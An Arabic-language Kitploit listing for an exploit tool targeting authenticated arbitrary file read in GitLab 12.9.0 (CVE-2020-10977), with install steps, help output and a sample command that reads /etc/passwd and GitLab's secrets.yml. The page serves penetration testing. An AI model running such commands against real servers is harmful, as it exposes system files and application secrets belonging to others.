Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
gitlab-12.9.0-file-read — نص برمجي (يريد أن يكون) أفضل مما يمكن العثور عليه على exploit-db حول قراءة الملفات التعسفية الموثّقة على GitLab v12.9.0 (CVE-2020-10977) | Kitploit
أدوات/GitHubGitHub/erk3/gitlab-12.9.0-file-read
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHuberk3/gitlab-12.9.0-file-read

gitlab-12.9.0-file-read

نص برمجي (يريد أن يكون) أفضل مما يمكن العثور عليه على exploit-db حول قراءة الملفات التعسفية الموثّقة على GitLab v12.9.0 (CVE-2020-10977)

عرض المستودع
منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

التحذير

لأغراض العرض التوضيحي والاختراق الأخلاقي فقط.

ما هي؟

نص برمجي (يطمح لأن يكون) أفضل مما هو موجود على exploit-db حول قراءة الملفات التعسفية بعد المصادقة على GitLab v12.9.0 (CVE-2020-10977)

الطريقة

  1. ثبّت التبعية (غالبًا لديك الباقي بالفعل)

pip3 install requests python-gitlab

  1. احصل على رمز API باستخدام بيانات اعتمادك

https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html

  1. الربح؟
root@kitploit:~
$ python3 gitlab-12.9.0-lfi.py -h
usage: gitlab-12.9.0-lfi.py [-h] -H HOST -u USER -p PASSWD -t TOKEN -f FILES

optional arguments:
  -h, --help            show this help message and exit
  -H HOST, --host HOST  The https URI to gitlab webroot
  -u USER, --user USER  The user name
  -p PASSWD, --passwd PASSWD
                        The user password
  -t TOKEN, --token TOKEN
                        The access token
  -f FILES, --files FILES
                        The absolute paths to the files on the Gitlab local system
root@kitploit:~
$ python3 gitlab-12.9.0-file-read.py -H https://gitlab.domain.com/ -u erk3 -p test1234 -t 9nsDFXshb1txxkkZAv24 -f /etc/passwd -f /etc/hosts -f /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml
تنزيل الأداة